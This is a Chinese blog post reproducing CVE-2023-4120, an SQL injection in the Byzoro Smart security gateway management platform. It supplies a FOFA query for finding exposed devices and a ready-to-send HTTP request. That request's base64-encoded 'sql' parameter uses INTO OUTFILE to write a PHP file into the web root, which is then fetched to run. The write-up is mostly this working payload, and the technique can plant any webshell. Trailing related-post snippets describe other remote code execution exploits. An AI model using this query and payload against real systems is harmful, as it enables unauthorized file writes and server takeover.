[复现]百卓智能Smart__sql注入_CVE-2023-4120漏洞复现

已于 2024-01-16 14:59:41 修改
阅读量514 收藏 8
点赞数 10
文章标签: sql 数据库
于 2024-01-16 10:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135602512
版权

0x01 fofa语句

app="byzoro-Smart"

0x02 漏洞版本

Smart--管理平台

0x03 漏洞复现

测试php代码 > 0xHex编码 > 替换SQL写入文件内容 > 完整SQL语句base64编码 >替换sql传参值 > 访问执行

a

自定义sql语句

b

输入sql语句

select 0x3C3F706870206563686F2027A04356452D323032332D343132302074657374273B203F3E into outfile '/usr/hddocs/nsg/app/haha123.php'
​
base64编码后
​
c2VsZWN0IDB4M0MzRjcwNjg3MDIwNjU2MzY4NkYyMDI3Njg2MTY4NjEyQzc0Njg2OTczMjA2OTczMjA3NDY1NzM3NDIwNjY2OTZDNjUyNzNCM0YzRSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGFoYTEyMy5waHAn
 

c
 

 

base64编码后直接使用payload

GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M0MzRjcwNjg3MDIwNjU2MzY4NkYyMDI3Njg2MTY4NjEyQzc0Njg2OTczMjA2OTczMjA3NDY1NzM3NDIwNjY2OTZDNjUyNzNCM0YzRSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGFoYTEyMy5waHAn HTTP/1.1
Host: ip
Cookie: PHPSESSID=39efc8fe125ea1e7bd84ebbaa3ff6533
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
 

 

 

d
 

访问url
 

ip/app/haha123.php
 

 

0x04 poc
 

GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M0MzRjcwNjg3MDIwNjU2MzY4NkYyMDI3Njg2MTY4NjEyQzc0Njg2OTczMjA2OTczMjA3NDY1NzM3NDIwNjY2OTZDNjUyNzNCM0YzRSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGFoYTEyMy5waHAn HTTP/1.1
Host: ip
Cookie: PHPSESSID=39efc8fe125ea1e7bd84ebbaa3ff6533
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
 

访问ip/app/haha123.php

                

        

        

    




    

      

        

            

              
                
                  柯达_
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    10
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    8
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
CVE-2023-4120百卓智能Smart多业务安全网关智能管理平台SQL注入漏洞复现

				
			

			

				

					薛定谔嘚喵博客
				

				

					10-08
					
					510
					
				

			

		

		

			
				
北京百卓智能Smart管理平台S40~S85F发现漏洞漏洞编号CVE-2023-4120,级别为严重。此漏洞特征于管理组件文件 importhtml.php 的功能处理逻辑,对参数 sql 的传参处过滤不严,导致任意SQL语句的执行,造成任意恶意文件的写入,该漏洞已向公众披露并可能被使用。

			
		

	



                

              
                



	

		

			

				
					
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁

				
			

			

				

					01-19
				

			

		

		

			
				
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包  CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务  2、 强烈建议受影响...

			
		

	



                


  
              

                


	

		

			

				
					
百卓Smart管理平台 importexport.php SQL注入漏洞复现(CVE-2024-27718)

				
			

			

				

					qq_39894062的博客
				

				

					03-31
					
					395
					
				

			

		

		

			
				
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

			
		

	





	

		

			

				
					
PHP--远程命令执行漏洞CVE-2018-19518复现

				
			

			

				

					从不专注的人的博客
				

				

					06-28
					
					582
					
				

			

		

		

			
				
目录漏洞介绍漏洞复现进入容器移除环境
漏洞介绍
-php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。
-debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。
-ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行

			
		

	



		

			
		



	

		

			

				
					
php远程代码执行漏洞绕过,PHP远程代码执行漏洞:CVE

				
			

			

				

					weixin_42127754的博客
				

				

					03-19
					
					267
					
				

			

		

		

			
				
漏洞详情:Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。影响范围:Nginx+php-fpm的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。location ~ [^/]\.php(/|$) {fastcg...

			
		

	





	

		

			

				
					
thinkphp 远程执行漏洞修复方案_关于Cisco Smart Install远程命令执行漏洞的修复方法...

				
			

			

				

					weixin_32773101的博客
				

				

					01-09
					
					224
					
				

			

		

		

			
				
前言介绍国家信息安全漏洞共享平台(CNVD)收录了Cisco Smart Install远程命令执行漏洞(CNVD-2018-06774,对应CVE-2018-0171)。综合利用上述漏洞,允许未经身份验证的远程攻击者向远端Cisco设备的 TCP 4786 端口发送精心构造的恶意数据包,触发漏洞造成设备远程执行Cisco系统命令或拒绝服务(DoS)。目前,漏洞利用代码已公开,且厂商已发布漏洞修复...

			
		

	





	

		

			

				
					
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf

				
			

			

				

					09-27
				

			

		

		

			
				
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...

			
		

	





	

		

			

				
					
实战-PHP远程代码执行漏洞

				
			

			

				

					cainiao17441898的博客
				

				

					07-19
					
					643
					
				

			

		

		

			
				
环境搭建
搭建go语言环境
tar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gz #解压go环境到常用命令的目录下
└─# echo “export PATH=$PATH:/usr/local/go/bin” > /etc/profile.d/go.sh 配置go.sh
└─# source /etc/profile.d/go.sh #运行go.sh
└─# go
下载使用漏洞的工具phuip-fpizdam:
修改goproxy代理地址,默认地址国内无

			
		

	





	

		

			

				
					
命令执行php框架代码,ThinkPHP远程命令执行漏洞原理及复现

				
			

			

				

					weixin_42388716的博客
				

				

					03-09
					
					278
					
				

			

		

		

			
				
2018年12月11日,exploit-db更新了一个thinkphp框架远程代码执行漏洞exploit地址:https://www.exploit-db.com/exploits/45978由于框架对控制器名没有进行足够的检测导致在没有开启强制路由的情况下getshell漏洞影响范围Thinkphp 5.1.0 - 5.1.31Thinkphp 5.0.5 - 5.0.23安装:下载地址http...

			
		

	





	

		

			

				
					
Mybatis(四)特殊SQL的查询:模糊查询、批量删除、动态设置表明、添加功能获取自增的主键

				
			

			

				

					m0_73864806的博客
				

				

					07-26
					
					496
					
				

			

		

		

			
				
不适用#{ },’%?%‘ 问号是属于字符串的一部分 不会被解析成占位符,会被当作是我们字符串的一部分来解析,所以我们执行的语句中找不到占位符,但是我们却为占位符进行了赋值,所以说就会报错。#{ } 还是不使适用,会产生 ' '   ,动态设置表名的时候不可以带  '  '#{ } 在sql语句中被解析之后本身就会加上一个单引号 ' '我们使用${ } ,将#{}替换成${ }不可以使用#{} 需要使用${ }使用字符串拼接的方法。字符串 日期 字段名。

			
		

	





	

		

			

				
					
简单的 mongoDB 学习

				
			

			

				

					qq_19342829的博客
				

				

					07-31
					
					440
					
				

			

		

		

			
				
mongodb入门学习整理

			
		

	





	

		

			

				
					
社区养老服务小程序的设计

				
			

			

				

					Karen198的博客
				

				

					07-31
					
					378
					
				

			

		

		

			
				
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。

			
		

	





	

		

			

				
					
MySQL备份与恢复

					
最新发布

				
			

			

				

					m0_74860678的博客
				

				

					08-01
					
					283
					
				

			

		

		

			
				
在生产环境中,数据的安全性至关重要任何数据的丢失都可能产生严重的后果造成数据丢失的原因程序错误人为操作错误运算错误磁盘故障灾难(如火灾、地震)和盗窃# 开启二进制日志功能[mysqld]# 重启服务# 有 mysql-bin.000001 就代表成功。

			
		

	





	

		

			

				
					
二进制部署k8s集群之master节点和etcd数据库集群(上)

				
			

			

				

					zx52306的博客
				

				

					07-30
					
					1134
					
				

			

		

		

			
				
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)

			
		

	





	

		

			

				
					
【iOS】——持久化

				
			

			

				

					m0_73974920的博客
				

				

					07-30
					
					1038
					
				

			

		

		

			
				
因为plist文件不能够保存自定义对象。如果一个字典中保存有自定义对象,如果把这个对象写入到文件当中,它是不会生成 plist文件的。如果对象是NSString、NSDictionary、NSArray、NSData、NSNumber等类型,可以直接用NSKeyedArchiver进行归档和恢复。

			
		

	





	

		

			

				
					
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用

				
			

			

				

					
				

			

		

		

			
				
Apache Spark 命令注入漏洞CVE-2022-33891)  Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值